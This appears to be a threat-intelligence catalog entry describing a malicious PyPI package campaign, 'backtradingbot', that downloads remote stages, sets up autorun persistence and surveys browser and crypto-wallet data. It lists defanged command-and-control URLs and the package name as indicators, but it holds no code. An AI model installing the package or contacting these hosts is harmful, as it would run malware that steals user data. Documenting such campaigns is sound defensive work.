MALICIOUS (1) campaign cataloged at 2025-07-31(2).

1. The campaign has clearly malicious intent, like infostealers.
2. This is just the date of creating the catalog entry. It may not reflect the date of creation of the campaign itself.

2025-07-backtradingbot

Running the installed entry point downloads and executes remote code. During the analysis, the code was switching to websockets, adding a startup script and downloading next stages, which finally looked for browser and crypto wallet data. Currently, they seem not to attempt exfiltration of very sensitive data but rather a presence of different webbrowsers and wallets.

It uses the same remote domain as campaign 2025-07-db-indicator, but significantly different payload.

Abuse categories

basic_exfiltration

The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

crypto-related

Campaign uses crypto-related.

exfiltration_browser_data

Campaign uses exfiltration_browser_data.

peristence_autorun

Campaign uses peristence_autorun.

remote_script

Downloads and executes a remote malicious script.

References

Referenced resources may include blog posts about the campaign, malware analysis, sandbox reports, or other relevant information.

• https://bad-packages.kam193.eu/pypi/campaign/2025-07-db-indicator/

IoCs & related URLs

URLs with payloads, characteristic domains, C&C IPs, repositories with malicious code, etc.

• hxxps://api.etherjs.pro/sockets?type=2

• hxxps://api.etherjs.pro/sockets?type=2&cid=ft

• etherjs.pro

Packages in the campaign

campaign:2025-07-backtradingbot

• backtradingbot